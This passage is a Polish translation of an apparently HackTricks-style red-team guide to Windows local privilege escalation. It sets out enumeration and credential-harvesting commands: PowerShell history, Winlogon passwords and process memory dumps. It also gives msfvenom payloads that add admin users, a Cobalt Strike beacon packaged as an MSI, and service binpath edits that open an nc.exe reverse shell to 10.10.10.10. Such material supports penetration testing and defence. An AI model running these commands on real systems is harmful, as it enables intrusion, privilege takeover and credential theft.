Windows Local Privilege Escalation

Nauka hakerskiego AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Najlepsze narzędzie do szukania wektorów eskalacji uprawnień lokalnych w systemie Windows: WinPEAS

Początkowa teoria dotycząca systemu Windows

Tokeny dostępu

Jeśli nie wiesz, co to są tokeny dostępu w systemie Windows, przeczytaj następującą stronę, zanim przejdziesz dalej:

pageAccess Tokens

ACLs - DACLs/SACLs/ACEs

Sprawdź następującą stronę, aby uzyskać więcej informacji na temat ACLs - DACLs/SACLs/ACEs:

pageACLs - DACLs/SACLs/ACEs

Poziomy integralności

Jeśli nie wiesz, co to są poziomy integralności w systemie Windows, powinieneś przeczytać następującą stronę, zanim przejdziesz dalej:

pageIntegrity Levels

Kontrole bezpieczeństwa systemu Windows

W systemie Windows istnieje wiele rzeczy, które mogą uniemożliwić Ci wyliczenie systemu, uruchomienie plików wykonywalnych lub nawet wykrycie Twoich działań. Powinieneś przeczytać następującą stronę i wyliczyć wszystkie te mechanizmy obronne przed rozpoczęciem wyliczania eskalacji uprawnień:

pageWindows Security Controls

Informacje o systemie

Wyliczenie informacji o wersji

Sprawdź, czy wersja systemu Windows ma jakieś znane podatności (sprawdź również zastosowane łatki).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture
[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Wersje Wykorzystań

Ta strona jest przydatna do wyszukiwania szczegółowych informacji na temat podatności związanych z bezpieczeństwem Microsoftu. Ta baza danych zawiera ponad 4 700 podatności związanych z bezpieczeństwem, pokazując ogromną powierzchnię ataku, jaką prezentuje środowisko Windows.

Na systemie

  • post/windows/gather/enum_patches

  • post/multi/recon/local_exploit_suggester

  • winpeas (Winpeas ma wbudowany watson)

Lokalnie z informacjami systemowymi

Repozytoria Github z wykorzystaniami:

Środowisko

Czy jakiekolwiek dane uwierzytelniające/cenne informacje są zapisane w zmiennych środowiskowych?

set
dir env:
Get-ChildItem Env: | ft Key,Value

Historia PowerShell

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

Pliki transkryptów PowerShell

Możesz dowiedzieć się, jak to włączyć pod adresem https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

Logowanie modułu PowerShell

Szczegóły wykonania potoku PowerShell są rejestrowane, obejmując wykonane polecenia, wywołania poleceń i części skryptów. Jednakże pełne szczegóły wykonania i wyniki wyjściowe mogą nie zostać uchwycone.

Aby to włączyć, postępuj zgodnie z instrukcjami w sekcji "Pliki transkryptów" dokumentacji, wybierając "Logowanie modułu" zamiast "Transkrypcja Powershell".

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Aby wyświetlić ostatnie 15 zdarzeń z dziennika zdarzeń Powershell, możesz wykonać:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Logowanie bloków skryptów

Zapisywana jest kompletna aktywność i pełna treść wykonania skryptu, zapewniając, że każdy blok kodu jest udokumentowany podczas jego działania. Ten proces zachowuje kompleksowy ślad audytu każdej aktywności, co jest cenne dla forensyki i analizowania złośliwego zachowania. Dokumentując całą aktywność w czasie wykonania, zapewniane są szczegółowe wglądy w proces.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Rejestrowanie zdarzeń dla bloku skryptów można znaleźć w Podglądzie zdarzeń systemu Windows pod ścieżką: Dzienniki aplikacji i usług > Microsoft > Windows > PowerShell > Operacyjne. Aby wyświetlić ostatnie 20 zdarzeń, można użyć:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Ustawienia internetowe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Napędy

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Możesz skompromitować system, jeśli aktualizacje nie są żądane za pomocą protokołu httpS, ale http.

Zacznij od sprawdzenia, czy sieć używa aktualizacji WSUS bez SSL, uruchamiając:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Jeśli otrzymasz odpowiedź w stylu:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

I jeśli HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer jest równe 1.

Wtedy, jest podatne na eksploatację. Jeśli ostatni rejestr jest równy 0, to wpis WSUS zostanie zignorowany.

Aby wykorzystać te podatności, można użyć narzędzi takich jak: Wsuxploit, pyWSUS - Są to zbrojne skrypty eksploitów typu MiTM do wstrzykiwania "fałszywych" aktualizacji do ruchu WSUS bez SSL.

Przeczytaj badania tutaj:

WSUS CVE-2020-1013

Przeczytaj pełny raport tutaj. W zasadzie, to jest błąd, który eksploatuje ta luka:

Jeśli mamy możliwość modyfikacji lokalnego proxy użytkownika i Windows Update korzysta z ustawień proxy skonfigurowanych w ustawieniach Internet Explorera, mamy zatem możliwość uruchomienia PyWSUS lokalnie, aby przechwycić własny ruch i uruchomić kod jako użytkownik z podwyższonymi uprawnieniami na naszym zasobie.

Ponadto, ponieważ usługa WSUS korzysta z ustawień bieżącego użytkownika, będzie ona również korzystać z jego magazynu certyfikatów. Jeśli wygenerujemy samopodpisany certyfikat dla nazwy hosta WSUS i dodamy ten certyfikat do magazynu certyfikatów bieżącego użytkownika, będziemy mogli przechwycić zarówno ruch WSUS HTTP, jak i HTTPS. WSUS nie korzysta z mechanizmów podobnych do HSTS do wprowadzenia walidacji typu zaufanie przy pierwszym użyciu certyfikatu. Jeśli certyfikat przedstawiony jest zaufany przez użytkownika i ma poprawną nazwę hosta, zostanie zaakceptowany przez usługę.

Można wykorzystać tę podatność za pomocą narzędzia WSUSpicious (gdy zostanie udostępnione).

KrbRelayUp

Istnieje podatność na lokalne eskalacje uprawnień w środowiskach Windows domenowych pod określonymi warunkami. Warunki te obejmują środowiska, w których podpisywanie LDAP nie jest wymuszone, użytkownicy posiadają uprawnienia do konfigurowania delegacji ograniczonej opartej na zasobach (RBCD) oraz możliwość tworzenia komputerów w domenie. Ważne jest zauważenie, że te wymagania są spełnione przy użyciu ustawień domyślnych.

Znajdź eksploit w https://github.com/Dec0ne/KrbRelayUp

Aby uzyskać więcej informacji na temat przebiegu ataku, sprawdź https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

Jeśli te 2 rejestry są włączone (wartość to 0x1), to użytkownicy dowolnych uprawnień mogą instalować (wykonywać) pliki *.msi jako NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Ładunki Metasploit

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

Jeśli masz sesję meterpreter, możesz zautomatyzować tę technikę, używając modułu exploit/windows/local/always_install_elevated

PowerUP

Użyj polecenia Write-UserAddMSI z power-up, aby utworzyć w bieżącym katalogu binarny plik Windows MSI do eskalacji uprawnień. Ten skrypt zapisuje skompilator instalatora MSI, który prosi o dodanie użytkownika/grupy (więc będziesz potrzebować dostępu do GUI):

Write-UserAddMSI

Wykonaj utworzony plik binarny, aby uzyskać wyższe uprawnienia.

Opakowanie MSI

Przeczytaj ten samouczek, aby dowiedzieć się, jak utworzyć opakowanie MSI za pomocą tych narzędzi. Zauważ, że możesz opakować plik ".bat", jeśli chcesz tylko wykonać polecenia wiersza poleceń

pageMSI Wrapper

Utwórz MSI za pomocą WIX

pageCreate MSI with WIX

Utwórz MSI za pomocą Visual Studio

  • Generuj za pomocą Cobalt Strike lub Metasploit nowy ładunek TCP EXE systemu Windows w C:\privesc\beacon.exe

  • Otwórz Visual Studio, wybierz Utwórz nowy projekt i wpisz "installer" w polu wyszukiwania. Wybierz projekt Kreatora instalacji i kliknij Dalej.

  • Nadaj projektowi nazwę, na przykład AlwaysPrivesc, użyj C:\privesc jako lokalizacji, wybierz umieść rozwiązanie i projekt w tym samym katalogu, a następnie kliknij Utwórz.

  • Klikaj Dalej aż do kroku 3 z 4 (wybierz pliki do dołączenia). Kliknij Dodaj i wybierz ładunek Beacon, który właśnie wygenerowałeś. Następnie kliknij Zakończ.

  • Zaznacz projekt AlwaysPrivesc w Eksploratorze rozwiązań i w Właściwościach zmień TargetPlatform z x86 na x64.

  • Możesz zmienić inne właściwości, takie jak Autor i Producent, co może sprawić, że zainstalowana aplikacja będzie wyglądać bardziej legalnie.

  • Kliknij prawym przyciskiem myszy na projekcie i wybierz Widok > Działania niestandardowe.

  • Kliknij prawym przyciskiem myszy Zainstaluj i wybierz Dodaj działanie niestandardowe.

  • Dwukrotnie kliknij na Folder aplikacji, wybierz plik beacon.exe i kliknij OK. Zapewni to, że ładunek Beacon zostanie wykonany zaraz po uruchomieniu instalatora.

  • W Właściwościach działania niestandardowego zmień Run64Bit na True.

  • Na koniec zbuduj to.

  • Jeśli pojawi się ostrzeżenie Plik 'beacon-tcp.exe' kierujący do 'x64' nie jest zgodny z platformą docelową projektu 'x86', upewnij się, że ustawiasz platformę na x64.

Instalacja MSI

Aby wykonać instalację złośliwego pliku .msi w tle:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Aby wykorzystać tę podatność, możesz użyć: exploit/windows/local/always_install_elevated

Antywirusy i Detektory

Ustawienia Audytu

Te ustawienia decydują, co jest rejestrowane, dlatego powinieneś zwrócić uwagę

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, jest interesujące wiedzieć, gdzie są wysyłane dzienniki

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS został zaprojektowany do zarządzania hasłami lokalnych administratorów, zapewniając, że każde hasło jest unikalne, zrandomizowane i regularnie aktualizowane na komputerach dołączonych do domeny. Te hasła są bezpiecznie przechowywane w Active Directory i mogą być dostępne tylko dla użytkowników, którzy otrzymali wystarczające uprawnienia poprzez listy ACL, pozwalając im na przeglądanie haseł lokalnych administratorów, jeśli są do tego upoważnieni.

pageLAPS

WDigest

Jeśli jest aktywny, hasła w postaci tekstu jawnego są przechowywane w LSASS (Local Security Authority Subsystem Service). Więcej informacji na temat WDigest na tej stronie.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

Ochrona LSA

Rozpoczynając od Windows 8.1, Microsoft wprowadził zwiększoną ochronę dla Lokalnego Organu Bezpieczeństwa (LSA), aby zablokować próby niezaufanych procesów odczytu jego pamięci lub wstrzyknięcia kodu, dodatkowo zabezpieczając system. Więcej informacji na temat Ochrony LSA tutaj.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Ochrona poświadczeń

Ochrona poświadczeń została wprowadzona w systemie Windows 10. Jej celem jest zabezpieczenie przechowywanych na urządzeniu poświadczeń przed zagrożeniami takimi jak ataki typu pass-the-hash.| Więcej informacji na temat Ochrony poświadczeń tutaj.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Zachowane dane uwierzytelniające

Dane uwierzytelniające domeny są uwierzytelniane przez Lokalny Władzę Bezpieczeństwa (LSA) i wykorzystywane przez komponenty systemu operacyjnego. Gdy dane logowania użytkownika są uwierzytelniane przez zarejestrowany pakiet zabezpieczeń, zwykle ustanawiane są dane uwierzytelniające domeny dla użytkownika. Więcej informacji na temat zachowanych danych uwierzytelniających tutaj.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Użytkownicy i Grupy

Wylicz Użytkowników i Grupy

Należy sprawdzić, czy jakiekolwiek z grup, do których należysz, mają interesujące uprawnienia.

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Grupy uprzywilejowane

Jeśli należysz do jakiejś grupy uprzywilejowanej, możesz mieć możliwość eskalacji uprawnień. Dowiedz się więcej o grupach uprzywilejowanych i jak je wykorzystać do eskalacji uprawnień tutaj:

pagePrivileged Groups

Manipulacja tokenem

Dowiedz się więcej, czym jest token na tej stronie: Tokeny systemu Windows. Sprawdź następną stronę, aby dowiedzieć się więcej o interesujących tokenach i jak je wykorzystać:

pageAbusing Tokens

Zalogowani użytkownicy / Sesje

qwinsta
klist sessions

Foldery domowe

dir C:\Users
Get-ChildItem C:\Users

Polityka hasła

net accounts

Pobierz zawartość schowka

powershell -command "Get-Clipboard"

Uruchamianie procesów

Uprawnienia plików i folderów

Po pierwsze, wypisanie procesów sprawdza hasła w wierszu poleceń procesu. Sprawdź, czy możesz nadpisać pewien uruchamiany plik binarny lub czy masz uprawnienia do zapisu w folderze binarnym, aby wykorzystać ewentualne ataki DLL Hijacking:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Zawsze sprawdzaj, czy są uruchomione możliwe debuggery electron/cef/chromium, można je wykorzystać do eskalacji uprawnień.

Sprawdzanie uprawnień binarnych procesów

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Sprawdzanie uprawnień folderów binarnych procesów (Hijacking DLL)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Wydobywanie hasła z pamięci

Możesz utworzyć zrzut pamięci działającego procesu za pomocą procdump z sysinternals. Usługi takie jak FTP mają poświadczenia w postaci tekstu jawnego w pamięci, spróbuj wykonać zrzut pamięci i odczytać poświadczenia.

procdump.exe -accepteula -ma <proc_name_tasklist>

Niestabilne aplikacje GUI

Aplikacje działające jako SYSTEM mogą umożliwić użytkownikowi uruchomienie CMD lub przeglądanie katalogów.

Przykład: "Pomoc i obsługa techniczna systemu Windows" (Windows + F1), wyszukaj "wiersz polecenia", kliknij "Kliknij, aby otworzyć wiersz polecenia"

Usługi

Pobierz listę usług:

net start
wmic service list brief
sc query
Get-Service

Uprawnienia

Możesz użyć sc, aby uzyskać informacje o usłudze

sc qc <service_name>

Zaleca się posiadanie binarnej aplikacji accesschk z Sysinternals, aby sprawdzić wymagany poziom uprawnień dla każdej usługi.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Zaleca się sprawdzenie, czy "Użytkownicy uwierzytelnieni" mogą modyfikować jakikolwiek usługę:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

Możesz pobrać accesschk.exe dla systemu XP tutaj

Włącz usługę

Jeśli masz ten błąd (na przykład z SSDPSRV):

System error 1058 has occurred. The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Możesz go włączyć, używając

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Należy pamiętać, że usługa upnphost zależy od SSDPSRV, aby działać (dla XP SP1)

Innym rozwiązaniem tego problemu jest uruchomienie:

sc.exe config usosvc start= auto

Modyfikacja ścieżki binarnej usługi

W przypadku, gdy grupa "Użytkownicy uwierzytelnieni" posiada SERVICE_ALL_ACCESS do usługi, możliwa jest modyfikacja wykonywalnego pliku binarnego usługi. Aby zmodyfikować i uruchomić sc:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Uruchom ponownie usługę

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Uprawnienia można eskalować poprzez różne uprawnienia:

  • SERVICE_CHANGE_CONFIG: Pozwala na ponowną konfigurację binarnej usługi.

  • WRITE_DAC: Umożliwia ponowną konfigurację uprawnień, co prowadzi do możliwości zmiany konfiguracji usługi.

  • WRITE_OWNER: Umożliwia przejęcie własności i ponowną konfigurację uprawnień.

  • GENERIC_WRITE: Dziedziczy zdolność do zmiany konfiguracji usługi.

  • GENERIC_ALL: Dziedziczy również zdolność do zmiany konfiguracji usługi.

Do wykrywania i eksploatacji tej podatności można wykorzystać exploit/windows/local/service_permissions.

Słabe uprawnienia binarnych usług

Sprawdź, czy możesz modyfikować binarny plik wykonywany przez usługę lub czy masz uprawnienia do zapisu w folderze, w którym znajduje się binarny plik (DLL Hijacking). Możesz uzyskać każdy binarny plik wykonywany przez usługę, korzystając z wmic (nie w system32) i sprawdzić swoje uprawnienia za pomocą icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Możesz również użyć sc i icacls:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Uprawnienia modyfikacji rejestru usług

Należy sprawdzić, czy można modyfikować dowolny rejestr usług. Możesz sprawdzić swoje uprawnienia do rejestru usług wykonując:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Należy sprawdzić, czy Użytkownicy uwierzytelnieni lub NT AUTHORITY\INTERACTIVE posiadają uprawnienia FullControl. Jeśli tak, to można zmienić ścieżkę wykonywania binarnego.

Aby zmienić ścieżkę wykonywania binarnego:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Uprawnienia do dodawania danych/dodawania podkatalogów w rejestrze usług

Jeśli masz to uprawnienie w rejestrze, oznacza to, że możesz tworzyć podrejestry z tego. W przypadku usług systemu Windows jest to wystarczające do wykonania dowolnego kodu:

pageAppendData/AddSubdirectory permission over service registry

Niezakodowane ścieżki usług

Jeśli ścieżka do pliku wykonywalnego nie znajduje się w cudzysłowach, system Windows spróbuje wykonać każdy fragment przed spacją.

Na przykład, dla ścieżki C:\Program Files\Some Folder\Service.exe system Windows spróbuje wykonać:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Wylistuj wszystkie niezakodowane ścieżki usług, wyłączając te należące do wbudowanych usług systemu Windows:

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v """ #Not only auto services

#Other way
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)
gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Możesz wykryć i wykorzystać tę lukę z metasploitem: exploit/windows/local/trusted\_service\_path Możesz ręcznie utworzyć binarny plik usługi z metasploita:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Działania w przypadku awarii

System Windows umożliwia użytkownikom określenie działań do podjęcia w przypadku awarii usługi. Ta funkcja może być skonfigurowana tak, aby wskazywała na plik binarny. Jeśli ten plik binarny jest wymienialny, możliwe jest eskalacja uprawnień. Więcej szczegółów można znaleźć w oficjalnej dokumentacji.

Aplikacje

Zainstalowane aplikacje

Sprawdź uprawnienia plików binarnych (być może można nadpisać jeden z nich i uzyskać wyższe uprawnienia) oraz folderów (Przechwytywanie DLL).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Uprawnienia do zapisu

Sprawdź, czy możesz modyfikować pewien plik konfiguracyjny, aby odczytać jakiś specjalny plik, lub czy możesz modyfikować pewny plik binarny, który zostanie wykonany przez konto Administratora (schedtasks).

Sposób na znalezienie słabych uprawnień folderów/plików w systemie to:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"
Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

Uruchomienie przy starcie systemu

Sprawdź, czy możesz nadpisać pewne wpisy rejestru lub pliki binarne, które zostaną wykonane przez innego użytkownika. Przeczytaj poniższą stronę, aby dowiedzieć się więcej o interesujących lokalizacjach autostartu do eskalacji uprawnień:

pagePrivilege Escalation with Autoruns

Sterowniki

Sprawdź możliwe zainstalowane przez strony trzecie podejrzane/wrażliwe sterowniki.

driverquery
driverquery.exe /fo table
driverquery /SI

Przechwytywanie DLL w ścieżce

Jeśli masz uprawnienia do zapisu wewnątrz folderu obecnego w PATH, możesz przechwycić DLL załadowane przez proces i eskalować uprawnienia.

Sprawdź uprawnienia wszystkich folderów w ścieżce:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Aby uzyskać więcej informacji na temat nadużywania tego sprawdzenia:

pageWritable Sys Path +Dll Hijacking Privesc

Sieć

Udostępnienia

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

plik hosts

Sprawdź, czy na pliku hosts nie ma wpisów dotyczących innych znanych komputerów.

type C:\Windows\System32\drivers\etc\hosts

Interfejsy sieciowe i DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Otwarte porty

Sprawdź ograniczone usługi z zewnątrz

netstat -ano #Opened ports?

Tabela routingu

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

Tabela ARP

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Zasady zapory

Sprawdź tę stronę w poszukiwaniu poleceń związanych z zapora (wyświetlanie zasad, tworzenie zasad, wyłączanie, wyłączanie...)

Więcej poleceń do wykonywania inwentaryzacji sieci znajdziesz tutaj

Windows Subsystem dla systemu Linux (wsl)

C:\Windows\System32\bash.exe
C:\Windows\System32\wsl.exe

Binary bash.exe można również znaleźć w C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Jeśli uzyskasz uprawnienia roota, możesz nasłuchiwać na dowolnym porcie (po raz pierwszy używając nc.exe do nasłuchiwania na porcie, zostanie poproszony interfejsem GUI o zezwolenie na nc przez zaporę ogniową).

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Aby łatwo uruchomić bash jako root, możesz spróbować --default-user root

Możesz przeglądać system plików WSL w folderze C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

Windows Dane uwierzytelniające

Dane uwierzytelniające Winlogon

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername"

#Other way
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultDomainName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword

Menedżer poświadczeń / Skarbiec systemu Windows

Z https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault Skarbiec systemu Windows przechowuje poświadczenia użytkowników do serwerów, stron internetowych i innych programów, które system Windows może automatycznie zalogować użytkowników. Na pierwszy rzut oka może się wydawać, że użytkownicy mogą przechowywać swoje poświadczenia do Facebooka, Twittera, Gmaila itp., aby automatycznie logować się za pośrednictwem przeglądarek. Ale tak nie jest.

